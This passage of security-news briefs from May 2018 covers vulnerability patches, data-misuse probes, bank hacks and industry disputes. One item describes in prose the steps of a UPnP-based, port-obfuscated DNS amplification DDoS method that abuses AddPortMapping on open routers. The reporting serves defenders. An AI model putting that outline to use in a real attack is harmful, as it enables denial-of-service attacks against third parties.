According to ICS-CERT, the flaws affect WebAccess versions V8.2_20170817 and prior, WebAccess V8.3.0 and prior, WebAccess Dashboard V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior. The vendor patched them with the release of version 8.3.1 last week.

ICS-CERT has credited researchers Mat Powell, Andrea Micalizzi (rgod), Steven Seeley, Donato Onofri and Simone Onofri for discovering the security bugs. Many of the weaknesses were reported through Trend Micro’s Zero Day Initiative (ZDI), which will publish advisories in the coming weeks.

Seeley has identified tens of vulnerabilities in WebAccess this year, and some of them, affecting WebAccess HMI Designer, were disclosed in April before Advantech released patches.

ICS-CERT has published a total of four advisories for Advantech WebAccess vulnerabilities this year, including two in January.

A report published last year by Trend Micro’s Zero Day Initiative (ZDI) showed that it had taken Advantech, on average, 131 days to patch vulnerabilities, which was significantly better compared to many other major ICS vendors. ZDI published more than 50 advisories for Advantech vulnerabilities in 2017, which was roughly half the number published in the previous year.


Facebook Suspends 200 Apps Over Data Misuse
16.5.2018 securityweek 
Social

Facebook said Monday it has suspended "around 200" apps on its platform as part of an investigation into misuse of private user data.

The investigation was launched after revelations that political consulting firm Cambridge Analytica hijacked data on some 87 million Facebook users as it worked on Donald Trump's 2016 campaign.

"The investigation process is in full swing," said an online statement from Facebook product partnerships vice president Ime Archibong.

"We have large teams of internal and external experts working hard to investigate these apps as quickly as possible. To date thousands of apps have been investigated and around 200 have been suspended -- pending a thorough investigation into whether they did in fact misuse any data."

Archibong added that "where we find evidence that these or other apps did misuse data, we will ban them and notify people via this website."

The revelations over Cambridge Analytica have prompted investigations on both sides of the Atlantic and led Facebook to tighten its policies on how personal data is shared and accessed.

Facebook made a policy change in 2014 limiting access to user data but noted that some applications still had data it had obtained prior to the revision.

"There is a lot more work to be done to find all the apps that may have misused people's Facebook data -- and it will take time," Archibong said.


Behind the Scenes in the Deceptive App Wars
16.5.2018 securityweek  Security

All is not well in the app ecosphere. That ecosphere comprises a large number of useful apps that benefit users, and an unknown number of apps that deceive users. The latter are sometimes described potentially unwanted programs, or PUPs. Both categories need to make money: good apps are upfront with how this is achieved; deceptive apps hide the process.

In recent years there has been an increasing effort to cleanse the ecosphere of deceptive apps. The anti-virus (AV) industry has taken a more aggressive stance in flagging and sometimes removing what it calls PUPs; the Clean Software Alliance (CSA) was founded to help guide app developers away from the dark side; and a new firm, AppEsteem, certifies good apps and calls out bad apps in its ‘Deceptor’ program.

One name figures throughout: Dennis Batchelder. He is currently president of the AV-dominated Anti-Malware Testing Standards Organization (AMTSO); was a leading light in the formation, and until recently a member of the advisory board, of the CSA; and is the founder of AppEsteem.

But there has been a falling out between the CSA and AppEsteem.

The CSA
The CSA was officially launched in the Fall of 2015, although it had already been on the drawing board for over a year. Batchelder was instrumental in getting it started while he was working for Microsoft, where he was director, program management until April 2016.

The CSA was introduced during VB2015 with a joint presentation from Microsoft and Google, demonstrating early support from the industry’s big-hitters.

“As a 501(c)(6) nonprofit trade association,” writes the CSA on its website, “the CSA works to advance the interests of the software development community through the establishment and enforcement of guidelines, policies and technology tools that balance the software industry’s needs while preserving user choice and user control.”

In other words, it seeks to develop an app ecosphere where honest developers can be fairly recompensed, via monetization, for their labor. However, it provides very little information on its website. It does not, for example, list the members of the trade association, nor give any indication on how it will enforce its guidelines and policies on recalcitrant apps.

AppEsteem
Founded by Batchelder in 2016, AppEsteem is primarily an app certification organization – it certifies clean apps. However, since a carrot works best when supported by a stick, AppEsteem also calls out those apps it considers to be deceptive and therefore potentially harmful to users.

Batchelder hoped that the CSA and AppEsteem could work together (he was on the advisory board of the former and is president of the latter). The CSA could provide recommendations and industry support on classification criteria, and AppEsteem – at one step removed – could provide the enforcement element apparently missing in the CSA.

AppEsteem maintains what it calls the ‘deceptor list’; a list of apps that in its own judgement use deceptive means to increase their monetization potential. At the time of writing, there are more than 300 apps on the deceptor list. It also actively encourages AV firms to use this list in their own attempts at blocking PUPs.

There is a difficult balance. Deceptive app developers will object to being included on a public shaming list. Apps that get clean need to be removed in a timely fashion. New methods of deception need to be recognized and included in the bad behavior criteria.

It is, in short, a process wide open for criticism from app developers who are called out.

CSA criticizes AppEsteem
Criticism came last week from an unexpected source – from the CSA. On 10 May 2018, the CSA published a remarkably negative report on AppEsteem’s ‘deceptor’ program titled, CSA Review of AppEsteem Programs. It was, said the CSA, “triggered by a groundswell of complaints and expressions of concern received by the CSA from industry members regarding this program.”

The report is largely – although not entirely – negative. It raises some interesting points. The ‘groundswell of complaints’ is to be expected; particularly from the apps and the app developers called out for being deceptive.

However, concern over some other elements seem valid. AppEsteem does not seem keen to call out AV products, even when they appear to use ‘deceptive’ practices (consider, for example, the ease with which the user can download one product and find that McAfee has also been downloaded).

Furthermore, if certification is annual, a certified app could introduce deceptive practices immediately after certification that would go undetected (would effectively be allowed) for 12 months. “There is no more deceptive or risky behavior than that,” notes the report.

The CSA report makes four proposals. AppEsteem should: refocus efforts on certification; work with the CSA to devise consensus‐built ‘minbar’ criteria; balance violator identification and remediation; and embrace oversight and dispute resolution.

‘Oversight’ implies external management. Refocusing on certification implies abandoning the deceptor app listing. And ‘work with the CSA’ implies that AppEsteem should take its direction from the CSA. If not quite a power grab, the report attempts to neutralize the enforcement element of AppEsteem.

AppEsteem’s response
AppEsteem’s first response was for Batchelder to resign from the CSA advisory board. “I unable to figure out how to remain on the CSA Advisory Board in good conscience,” he wrote to the CSA. “Which sucks, as I’ve pushed for CSA to get operational and remain relevant, sent potential members its way, and worked hard to help it succeed. But being an advisor of an incorporator-status organization who is conducting a ‘confidential’ investigation into AppEsteem’s certification program without involving AppEsteem makes no sense at all.”

AppEsteem’s second response was to establish CleanApps.org; which is effectively an alternative to the CSA. “AppEsteem needs CSA,” comments one source who asked to be anonymous, “or at least some organization that can provide guidelines and some kind of oversight of what AppEsteem is doing… It seems that this new player is in fact a company created by Dennis trying to get rid of CSA.”

That partly makes sense. If AppEsteem cannot work with the CSA, it must find a similar organization it can work with. “After I disengaged from CSA, Batchelder told SecurityWeek, “we realized that AppEsteem had to find a way to get the vendor voice and to reassure them that we’re doing things fairly (the stuff we had hoped CSA would do). So, I incorporated CleanApps.org and recruited its first board from some of our customers (I know, it’s like a soap opera), and then resigned/handed it over once the board launched. Our goal is that once CleanApps.org launches, we’ll give them insight into our operations.”

To the CSA, he wrote in February, “I wanted to let you know that we have determined that it’s in best interests of both ourselves, our customers, and the vendor community if we had oversight and a ‘voice’ specifically representing the vendor community… We won’t become a member or hold any position in CleanApps.org; they will self-govern.” (He has since made it clear that he does not mean ‘oversight’ in any controlling manner.)

AppEsteem’s position seems to be that the app ecosphere requires three organizations: AppEsteem to enforce good behavior among the app developers; the CSA to represent the market in which apps operate; and CleanApps to represent the apps and app developers.

But it is clearly concerned over the current relevance of the CSA. “I think the biggest hole with CSA,” Batchelder told SecurityWeek, “is that they never finished forming: it’s still just… as the only member, and what we felt was that when [that member] had an issue with us, CSA went negative… it’s problematic to us that they’re not formed after four years.”

If AppEsteem needs something like the CSA to be effective, the CSA needs something like AppEsteem to be relevant.

AppEsteem’s third response is a short blog posted on the same day as CSA published its report – Thursday, 10 May 2018. There is no indication of any rapprochement with the CSA. “But we also want to be clear,” writes the author: “if you think it’s fine to treat consumers as exploitable targets for deceptive and aggressive software, we totally understand your desire for us to leave you alone. We strongly suggest you either get on board or find something else to do with your time, as we’re going to continue to tune our Deceptor program to find even more effective ways to disrupt your ability to hurt consumers.”

The way forward
It is hard to see how any outright deceptive app produced by developers simply out to get as much money as possible will ever be persuaded by force of argument alone to abandon deceptive practices. This seems to be the approach of the CSA; and it appears – on the evidence of its website – to have achieved little in its three to four years of existence.

Indeed, the one and only report the CSA has published is the report criticizing AppEsteem. Before that, the previous publication seems to be ‘update #7’, probably written around March 2016.

If the CSA has achieved anything, it is not saying so. At the very least, it could be urged to be more transparent in its operations and achievements – even a list of members would be useful.

Meantime, if the new CleanApps.org gathers pace and support, the CSA itself will become increasingly irrelevant in the battle against deceptive apps; that is, potentially unwanted programs.


Security Gaps Remain as OT, IT Converge
16.5.2018 securityweek  Cyber

The accelerating digitization of business, driven by compelling commercial arguments, is driving the integration of new information technology (IT) networks with older operational technology (OT) networks. This is introducing new security risks to old technology and old technology practices -- and where the OT is driving a critical manufacturing plant, the new risk is from nation-state actors as well as traditional cyber criminals.

The good news is that many organizations understand the risks and are actively engaged in mitigating those risks. The bad news is the risk mitigation process is far from complete.

Network and content security firm Fortinet commissioned Forrester Consulting to survey the state of converging IT / OT network security. In an associated blog, Fortinet's senior director of product marketing, Peter Newton, explains the cultural difference between IT and OT security: "IT teams have a tendency to just want to throw security technology at the network and call it good. But these networks can be very different, and what works well in one environment can have devastating consequences in the other. For example, an error that opens a port on a switch can have a very different result from one that opens a valve on a boiler."

In January 2018, Forrester queried 429 global decision-makers responsible for the security of their organization’s critical infrastructure from a range of different industries, asking about their IT / OT convergence (PDF) and the security challenges being faced. The result suggests that awareness is high, and steps are in progress (SCADA / ICS security spending is planned to increase by 77%) -- but there is much yet to be done (45% of respondents do not used privileged account management (PAM) for their administrators).

The last issue is particularly relevant given the extent to which converged networks are being opened to third-party suppliers. Sixty-four percent of the companies surveyed provide either complete or high-level access to their SCADA / ICS, including to outsourced suppliers, business partners and government agencies. This seems to be changing, with respondents taking steps to reduce the number of vendors used to provide security functions for IPS, NAC and IoT.

"The number of organizations that now rely on a single vendor to provide a full range of outsourced solutions has jumped from 38% to 47% between 2016 and 2018," comments John Maddison, Fortinet's SVP products and solutions, in a separate blog post.

Coupled with the lack of a PAM solution, the report highlights that 45% of the respondents do not use role-based access control, which provides openings for insider threats. Indeed, internal hackers are considered a greater threat (77% of respondents are extremely or very concerned) than external hackers (70%). The greatest concern is reserved for malware at 77%, with leakage of sensitive or confidential data at 70%.

The security threat is not hypothetical. While there have already been severaal highly-publicized incidents (such as the Ukraine power outages in December 2015, and the U.S. water utility incident in March 2016) the majority of respondents have also experienced a breach. Fifty-six percent of organizations using SCADA / ICS reported a breach in the past year, and only 11% indicated they have never been breached.

SCADA / ICS breaches can have serious consequences. "Sixty-three percent of organizations say the safety of their employees was highly or critically impacted by a SCADA / ICS security breach," notes the report. "Another 58% report major impacts to their organization’s financial stability, and 63% note a serious drag on their ability to operate at a sufficient level."

Solutions to the growing SCADA / ICS risk exist, but require a new approach beyond the traditional IT security approach. IT and OT teams speak different languages for security, comments Newton. Existing OT systems may be running on an obsolete operating system on hardware that is ten or more years old. "But that may be because it only has one job," he explains: "for example, monitoring a thermostat and then throwing a switch when it reaches a critical temperature. That doesn’t require the latest technology, and if it is doing the job it was designed to do, then there is no reason to change it. But because so many of these systems run on proprietary software and use delicate instrumentation, even something as benign as scanning a device for malware can cause it to malfunction."

Solutions do exist, but must be chosen with care. "When considering a security vendor for their SCADA / ICS environments," suggests Newton, "the ability to meet compliance standards and provide end-to-end solutions, along with a reputation for reliability are the most important attributes [the respondents] look for. These organizations are looking for solutions from a variety of vendors, from systems integrators to security manufacturers."


Hackers Divert Funds From Mexico Banks, Amount Unclear: Official
16.5.2018 securityweek  Hacking

Hackers have stolen an unknown amount of money from banks in Mexico in a series of cyber attacks on the country's interbank payments system, an official said Monday.

At least five attacks on the Mexican central bank's Interbank Electronic Payments System (SPEI) were carried out in April and May, said Lorenza Martinez, director general of the corporate payments and services system at the central bank.

"Some transactions were introduced that were not recognized by the issuing bank," she told Radio Centro.

"In some cases these transfers made it through to the destination bank and were withdrawn in cash."

She declined to reveal which banks were targeted.

Some Mexican media outlets have put the amount stolen at 400 million pesos ($20.4 million), but Martinez denied those reports.

"The amount is currently being analyzed. Some of the transfers were stopped, and the funds are currently being returned," she said.

She said the money stolen belonged to the banks themselves and that clients' funds were never affected.

The interbank payments system allows banks to make real-time transfers to each other.

They connect via their own computer systems or an external provider -- the point where the attacks appear to have taken place, Martinez said.

After the attacks were detected, banks switched to a slower but more secure method.

No new attacks have been registered since.


Adobe Patches Two Dozen Critical Flaws in Acrobat, Reader
16.5.2018 securityweek 
Vulnerebility

Updates released on Monday by Adobe for its Acrobat, Reader and Photoshop products patch nearly 50 vulnerabilities, including a remote code execution flaw that has been exploited in the wild.

A total of 47 security holes have been addressed in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017. The flaws have been resolved with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that allow arbitrary code execution in the context of the targeted user, and various types of “important” issues that can lead to information disclosure or security bypasses.

The most serious of the flaws is CVE-2018-4990, which has been exploited in the wild in combination with CVE-2018-8120, a zero-day vulnerability affecting Windows. CVE-2018-8120 was fixed by Microsoft with the May 2018 Patch Tuesday updates.

Independent experts and researchers from Cisco Talos, ESET, Kaspersky, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, Cybellum and Cure53 have been credited for responsibly disclosing the flaws patched with the latest Acrobat and Reader releases. Many of the security bugs were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe also informed customers that support for Acrobat and Reader 11.x ended on October 15, 2017, and that version 11.0.23 is the final release for these branches. Users have been advised to update to the latest versions of Acrobat DC and Acrobat Reader DC.

Adobe has also released security updates for the Windows and macOS versions of Photoshop CC to address a flaw reported by researcher Giwan Go.

Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4 fix a critical out-of-bounds write issue that can be exploited for arbitrary code execution in the context of the targeted user.

Earlier this month, Adobe patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products with the company’s Patch Tuesday updates.

The previous round of security updates for Acrobat and Reader resolved 39 vulnerabilities. However, those updates had been assigned a priority rating of “2,” which makes them less likely to be exploited, while the latest patches have been given a priority rating of “1,” which means exploitation is more likely and users should update as soon as possible.

*Updated with information on CVE-2018-4990


Symantec Shares More Information on Internal Investigation
16.5.2018 securityweek IT

Symantec shares gained nearly 10 percent on Monday in anticipation of a conference call that promised to provide more information regarding the internal investigation announced by the company last week.

Along with its financial results for the fourth quarter and full year, Symantec told investors last week that the Audit Committee of the Board of Directors had launched an investigation as a result of concerns raised by a former employee.

The company initially did not share any additional information, except that the Securities and Exchange Commission (SEC) had been notified and that the probe would likely prevent it from filing its annual 10-K report with the SEC in a timely manner.

Symantec shares dropped roughly 20 percent to less than $24 after the announcement was made on Thursday, and on Friday shares dove 33 percent, reaching just over $19.

A conference call announced for Monday afternoon helped the company gain nearly 10 percent, closing at $21.40.

While many expected Symantec to provide details on its internal probe, the company did not answer any questions on the matter. A statement published by the company does, however, reveal that the investigation is related to “concerns raised by a former employee regarding the Company’s public disclosures including commentary on historical financial results, its reporting of certain Non-GAAP measures including those that could impact executive compensation programs, certain forward-looking statements, stock trading plans and retaliation.”

The company says it cannot predict the duration of the investigation or the outcome, which could have an impact on financial results and guidance.

The cybersecurity firm says it does not anticipate a material adverse impact on its historical financial statements.

In response to news of the internal probe, investor rights law firm Rosen Law Firm announced the preparation of a class action to recover losses suffered by Symantec investors. Rosen says it’s investigating allegations that Symantec “may have issued materially misleading business information to the investing public.”


Kaspersky Lab to Move Core Infrastructure to Switzerland
16.5.2018 securityweek  BigBrothers

Swiss Data Storage

Company Will Open Transparency Center in Zurich by 2019; Data From Customers in North America Will be Stored and Processed in Switzerland

As part of its Global Transparency Initiative, Russia-based Kaspersky Lab today announced that it will adjust its infrastructure to move a number of "core processes" from Russia to Switzerland.

The security firm has had problems with the U.S. government. In September 2017, the U.S. Department of Homeland Security (DHS) instructed government departments and agencies to stop using products from the Russia-based firm.

There is no hard evidence that Kaspersky has ever colluded with the Russian government; and the lost U.S. government market is small in global terms. The bigger problem, however, is the knock-on effect that U.S. government criticism has on trust levels in the wider market.

In December 2017, Lithuania banned the use of Kaspersky Lab software within certain critical national industries. In April 2018, Twitter stopped accepting ads From Kaspersky Lab; and now, on May 15, 2018, the Dutch government announced it will phase out Kaspersky Lab anti-virus software 'as a precautionary measure'.

Justice Minister Ferdinand Grapperhaus told the Dutch parliament, “The (Dutch) cabinet has carried out an independent review and analysis and made a careful decision on that basis. Although there are no concrete cases of misuse known in the Netherlands, it cannot be excluded.”

Kaspersky Lab Logo

In December 2017, the UK's National Cyber Security Center published a letter it had sent to government permanent secretaries. It included, "In practical terms, this means that for systems processing information classified SECRET and above, a Russia-based provider should never be used."

It is to maintain or regain trust that is behind Kaspersky's Global Transparency Initiative, announced in October 2017.

"The new measures," the firm announced, "comprise the move of data storage and processing for a number of regions, the relocation of software assembly and the opening of the first Transparency Center," which will be in Zurich.

The measures in question include customer data storage and processing for most regions; and software assembly including threat detection updates. Transparency will be provided by making the source code available for review by responsible stakeholders in a dedicated Transparency Center.

The company said that by the end of 2018, its products and threat detection rule databases (AV databases) "will start to be assembled and signed with a digital signature in Switzerland, before being distributed to the endpoints of customers worldwide."

The firm is going further by making plans for its processes and source code to be independently supervised by a qualified third-party. To this end, it is supporting the creation of a new, non-profit organization able to assume this responsibility not just for itself, but for other partners and members who wish to join.

“The third-party organization is a non-profit organization to be established independently for the purpose of producing professional technical reviews of the trustworthiness of the security products of its members (including Kaspersky Lab)," the firm told SecurityWeek.

“Since transparency and trust are becoming universal requirements across the cybersecurity industry, Kaspersky Lab is supporting the creation of a new, non-profit organization to take on this responsibility, not just for the company, but for other partners and members who wish to join. The details of the new organization are currently being discussed and will be shared as soon as they are available.”

Switzerland has been chosen as the site of the Center as much for its symbolic importance as anything else. “We considered several locations for our first Transparency Center, and Switzerland most closely met our criteria as well as our policy of complete neutrality," Kaspersky Lab told SecurityWeek.

"We detect and remediate any malware, regardless of its source or purpose, while Switzerland has a long and famous history of neutrality. We also value Switzerland’s robust approach to data protection legislation.” Noticeably, Switzerland is one of just a handful of non-EU companies that has been recognized by Europe as having 'adequate' privacy controls.

Noticeably, Kaspersky Lab does not link the move specifically to the effects of the U.S. ban, but sees wider issues of global trust emerging. “We are implementing these measures first and foremost in response to the evolving, ultra-connected global landscape and the challenges the cyber-world is currently facing," it said.

"This is not exclusive to Kaspersky Lab, and we believe other organizations will in future also choose to adapt to these trends. Having said that, the overall aim of these measures is transparency, verified and proven, which means that anyone with concerns will now be able to see the integrity and trustworthiness of our solutions.”


Exploiting People Instead of Software: Report Shows Attacker Love for Human Interaction
16.5.2018 securityweek 
Exploit

Cybercriminals Continue to Rely on Human Interaction to Conduct Wide Range of Attacks

Cybercriminals have been scaling up people-centered threats, increasingly using social engineering rather than automated exploits even in web attacks, a recent report from Proofpoint report reveals.

Humans have been long said to be the best exploits in the eyes of cybecriminals, with social engineering becoming the most used attack method years back, when almost all attached documents and URLs in malicious emails required human interaction.

Now, Proofpoint’s The Human Factor 2018 report (PDF) reveals that both cybercriminals and threat actors have found new ways to trick victims into becoming their unwitting accomplices. Email remained the most popular attack vector, while the rise of crypto-currency drove innovations in phishing and cybercrime.

Proofpoint saw attacks that include both large, multimillion-message malicious campaigns distributing malware such as ransomware (the biggest email-borne threat of 2017) and highly targeted assaults orchestrated by state-sponsored groups and financially motivated fraudsters.

“Whether they are broad-based or targeted; whether delivered via email, social media, the web, cloud apps, or other vectors; whether they are motivated by financial gain or national interests, the social engineering tactics used in these attacks work time and time again. Victims clicked malicious links, downloaded unsafe files, installed malware, transferred funds, and disclosed sensitive information at scale,” Proofpoint notes.

Last year, suspiciously registered domains of large enterprises outnumbered brand-registered domains 20 to 1, according to the report. Furthermore, 95% of observed web-based attacks used social engineering to trick users into installing malware, 55% of social media attacks impersonating customer-support accounts targeted customers of financial services companies, and 35% of social media scams using links took users to video streaming and movie download sites.

Dropbox phishing was the top lure for phishing attacks, but click rates for Docusign lures were the highest. Network traffic of coin mining bots jumped almost 90% between September and November, while ransomware and banking Trojans accounted for more than 82% of all malicious email messages. Although used often in email campaigns, Microsoft Office exploits usually came in short bursts.

The largest numbers of email fraud attacks hit education, management consulting, entertainment, and media firms, while construction, manufacturing, and technology were the most phished industries. Manufacturing, healthcare, and technology firms were targeted the most by crimeware.

Although ransomware predominated worldwide, banking Trojans were highly popular in Europe and Japan, accounting for 36% and 37% of all malicious mail in those regions, respectively.

Proofpoint has examined hundreds of thousands of SaaS accounts during risk assessments conducted across industries and says that around 1% of all cloud service credentials have been leaked. Furthermore, the security firm discovered that 25% of all suspicious login attempts to cloud services were successful (24% of all logins to cloud services were suspicious).

Attackers are increasingly using cloud services that users are accustomed to receive email notifications from to send malicious messages and host malware. While no major cloud services avoided abuse, services such as G Suite and Evernote were used to send phishing emails and malware.

“Most cloud platforms are extensible. Third-party add-ons open up new features, but they also create possibilities for abuse. We found a vulnerability in Google Apps Script, for example, that allowed attackers to send malware through legitimate emails that came from G Suite accounts,” the security researchers report.

Looking at how people behave in response to these threats, Proofpoint discovered that North American employees tended to click at the beginning of the work day, at lunch, and the end of the work day. South America followed a similar pattern, but Australian employees were more likely to click in the morning.

Half of all clicks (52%), however occurred within one hour of the message being delivered, with 11% of recipients clicking on the malicious URL within the first minute and a quarter within 5 minutes.

Usually focused on high-profile targets, state-sponsored attackers and established cyber criminals switched to targeting smaller targets in 2017.

The North Korea- affiliated Lazarus Group launched multistage attacks against individuals and point-of-sale (POS) infrastructure to steal cryptocurrency and consumer credit card data. The financially-motivated FIN7 started targeting individuals within restaurant chains using a new backdoor and malicious macros.

The Cobalt Group used new malware and document exploits in attacks against financial institutions and used anti-sandbox features to make detection more difficult.

The security firm also observed cryptocurrency phishing campaigns and identified sophisticated phishing templates targeting wallets and exchanges, including one attack that used malicious Office documents to install a banking Trojan. As of January, the researchers discovered over 100,000 Bitcoin-related domains, some supposedly registered for nefarious purposes.

“Social engineering is at the heart of most attacks today. It can come through something as simple as a bogus invoice lure in a multimillion message malicious spam campaign. It may appear as an intricate fake chain of emails and out-of-band communications in email fraud. Even web-based attacks—which once depended almost exclusively on exploit kits and drive-by downloads—are now built around social engineering templates. People willingly download bogus software updates or fake anti-malware software,” Proofpoint notes.


New DDoS Attack Method Obfuscates Source Port Data
16.5.2018 securityweek 
Attack

Recent distributed denial of service (DDoS) attacks showed evidence of a new method being used to bypass existing defenses by obfuscating source port data, Imperva says.

In addition to commonly encountered amplification methods, the observed attacks used payloads with irregular source port data, a vector that only few DDoS defenders considered possible, Imperva claims. The attack method abuses a well-known, unpatched UPnP (Universal Plug and Play) protocol exploit.

The UPnP networking protocol allows for device discovery over UDP port 1900, and for device control over an arbitrarily chosen TCP port. Because of that, many Internet of Things devices use the protocol to discover and communicate to one another over LAN.

However, default settings leaving devices open to remote access, the lack of an authentication mechanism, and UPnP-specific remote code execution vulnerabilities have shown the protocol to pose security risks.

In addition to revealing UPnP related vulnerabilities for nearly two decades, security researchers have also shown how SOAP API calls could be used to remotely reconfigure insecure devices over WAN. SOAP API calls can also be used to remotely execute AddPortMapping commands, which govern port forwarding rules.

While mitigating a SSDP amplification assault on April 11, 2018, Imperva noticed that some of the payloads were arriving from an unexpected source port, and not UDP/1900. The same technique was used in another attack a couple of weeks later.

The investigation into these incidents led to the creation of a “PoC for an UPnP-integrated attack method that could be used to obfuscate source port information for any type of amplification payload,” the security firm says.

To perform DNS amplification attacks using this PoC, one would first have to locate an open UPnP router, which can be done by running a wide-scale scan with SSDP requests using a publicly available online service such as Shodan.

There are over 1.3 million devices that appear in such a search, although not all are vulnerable. Locating an exploitable one is still easy, as scripts can be used to automate the process.

Next, the attacker would need to access the device XML file (rootDesc.xml) via HTTP, which can be done by replacing the ‘Location’ IP with the actual device IP in Shodan.

With the rootDesc.xml file listing all of the available UPnP services and devices, the next step is to modify the device’s port forwarding rules, which can be done via the AddPortMapping command, which is the first on the said list.

“Using the scheme within the file, a SOAP request can be crafted to create a forwarding rule that reroutes all UDP packets sent to port 1337 to an external DNS server (3.3.3.3) via port UDP/53,” Imperva notes.

This works because, although port forwarding should only be used for mapping traffic from external IPs to internal IPs and vice versa, most routers don’t verify that a provided internal IP is actually internal, this allowing proxy requests from external IPs to another external IP.

To use this for port-obfuscated DNS amplification, a DNS request issued to the device and received by the UPnP device on port UDP/1337 is proxied to a DNS resolver over destination port UDP/53. The resolver responds to the device over source port UDP/53, and the device forwards the DNS response back to the original requestor after changing the source port back to UDP/1337.

“In an actual attack scenario, however, the initial DNS request would have been issued from a spoofed victim’s IP, meaning that the response would have been bounced back to the victim,” Imperva notes.

The device could be used to launch a DNS amplification DDoS assault with evasive ports, as the payloads would originate from irregular source ports, thus being able to bypass commonplace defenses that identify amplification payloads by looking for source port data. The evasion method can also be used for SSDP and NTP attacks and could work with other amplification vectors as well, including Memcached.

“With source IP and port information no longer serving as reliable filtering factors, the most likely answer is to perform deep packet inspection (DPI) to identify amplification payloads—a more resource-intensive process, which is challenging to perform at an inline rate without access to dedicated mitigation equipment,” Imperva notes.


Signal Flaw Allowed Code Execution With No User Interaction
16.5.2018 securityweek 
Vulnerebility

An update released over the weekend for the desktop version of the privacy-focused communications app Signal patches a critical vulnerability that could have been exploited for remote code execution with no user interaction required.

Several researchers were looking at an unrelated cross-site scripting (XSS) vulnerability when they noticed that the XSS payload was triggered in the Signal desktop application.

The white hat hackers discovered that they could execute arbitrary code in the app simply by sending a specially crafted message containing specific HTML elements to the targeted user.

“The Signal-desktop software fails to sanitize specific html-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically the <img> and <iframe> tags can be used to include remote or local resources,” the researchers explained in an advisory.

They created proof-of-concept (PoC) payloads that could be used to crash Signal, obtain data from the targeted device’s /etc/passwd file, execute a remote JavaScript file, display a message in an iframe, play audio and video files, display a phishing page, and exfiltrate conversations.

Signal code execution vulnerability

“The critical thing here was that it didn’t required any interaction form the victim, other than simply being in the conversation. Anyone can initiate a conversation in Signal, so the attacker just needs to send a specially crafted URL to pwn the victim without further action,” Iván Ariel Barrera Oro, one of the researchers involved in finding the vulnerability, wrote in a blog post.

The vulnerability affects versions 1.7.1, 1.8.0, 1.9.0 and 1.10.0 on Windows, Linux and likely macOS. Signal developers patched the issue within a couple of hours with the release of version 1.10.1 on Saturday.

Based on an analysis of the source code, researchers determined that the flaw had been previously patched but the fix was removed – likely by accident – with a change made on April 10.


Serbia Arrests FBI-sought Cybercrime Suspect
16.5.2018 securityweek  BigBrothers

Serbian police said Wednesday they had arrested a man sought by the FBI under suspicion of being part of a group of cybercriminals who called themselves "The Dark Overlord".

The arrest of the 38-year-old Serbian from Belgrade, identified only by his initials S.S., was carried out as part of an "international operation conducted by the FBI," a police statement said.

The goal was to identify and arrest hackers who used the name "The Dark Overlord" and had been committing cyberattacks since June 2016, the statement added.

Members of the group were "stealing information and personal data from US citizens, including property and intellectual property data, sensitive health insurance and medical treatment data," it said.

At least 50 people were victims of attacks, the investigation found.

Police said the arrested man is accused of "illegal access to protected computers, computer networks and extorsion".

In late April, a British and Dutch-led operation brought down a website linked to more than four million cyberattacks around the world, with banking giants among the victims.

Two people, suspected of being administrators of the webstresser(.)org website were arrested in Serbia at the time.


Some Firefox Screenshots End Up Publicly Accessible
16.5.2018 securityweek  Security

Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.

Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.

This allows users to save a screenshot of the entire page, of the visible section of the page, or use a selection tool to save only a region they consider important. Next, they can dismiss the action, copy the screenshot, download it, or click a “Save” button that sends the screenshot to the cloud.

All saved screenshots go to https://screenshots.firefox.com, a default setting in the browser. Furthermore, all screenshots that have been previously shared to public forums are indexed by search engines such as Google and could be discovered and accessed by anyone.

Screenshots are sent to the public server only when the user clicks the “Save” button. Many users, however, might have been long doing so without realizing that they were actually sending them to the cloud.

Firefox screenshots can end up publicly exposed

Mozilla issued a fix for the issue yesterday, soon after details on it emerged on Twitter. Apparently, this is not the first time the organization attempts to address this, but the previous implementation was flawed.

Specifically, in its attempt to avoid shot pages being indexed by search engines, Mozilla replaced robots.txt with <meta name=robots value=noindex>, but the fix was “only put in place for expired pages instead of all pages as intended.”

“So this is being deployed and now we're talking to DDG/Google etc to strip the domains,” John Gruen, UX-focused Product Manager at Mozilla, told the ethical hacker who discovered the flaw.

Updated: A previous version of this article incorrectly stated that all screenshots end up being publicly accessible.


Cambridge Analytica Shared Data With Russia: Whistleblower
16.5.2018 securityweek  BigBrothers

Political consulting group Cambridge Analytica used Russian researchers and shared data with companies linked to Russian intelligence, a whistleblower told a congressional hearing on interference in the 2016 US election Wednesday.

Christopher Wylie, who leaked information on the British-based firm's hijacking of data on millions of Facebook users, told a Senate panel he believes Russian intelligence services had access to data harvested by the consultancy.

Wylie told the panel that Russian-American researcher Aleksandr Kogan, who created an application to harvest Facebook user profile data, was working at the same time on Russian-funded projects, including "behavioral research."

"This means that in addition to Facebook data being accessed in Russia, there are reasonable grounds to suspect that CA may have been an intelligence target of Russian security services...(and) that Russian security services may have been notified of the existence of CA's Facebook data," Wylie said in his written testimony.

Wylie added that Cambridge Analytica "used Russian researchers to gather its data, (and) openly shared information on 'rumor campaigns' and 'attitudinal inoculation'" with companies and executives linked to the Russian intelligence agency FSB.

The hearing is part of a broad inquiry on both sides of the Atlantic over the misuse of Facebook data by the consulting firm working on Donald Trump's 2016 campaign.

Facebook has accused Cambridge Analytica of misappropriating its user data by violating terms of the data agreement with Kogan, the academic researcher.

On Tuesday, the New York Times reported that the FBI and Justice are investigating Cambridge Analytica for potential criminal violations.

The Times said it was unclear whether the probe was linked to the one led by Special Counsel Robert Mueller, who is investigating whether the Trump campaign colluded with Russia.

'Black ops' at CA

Wylie told the panel that "the ethos of the firm was 'anything goes'" for its political campaigns, including "attempting to divert health ministry funds in a struggling African country to support a politician's re-election campaign."

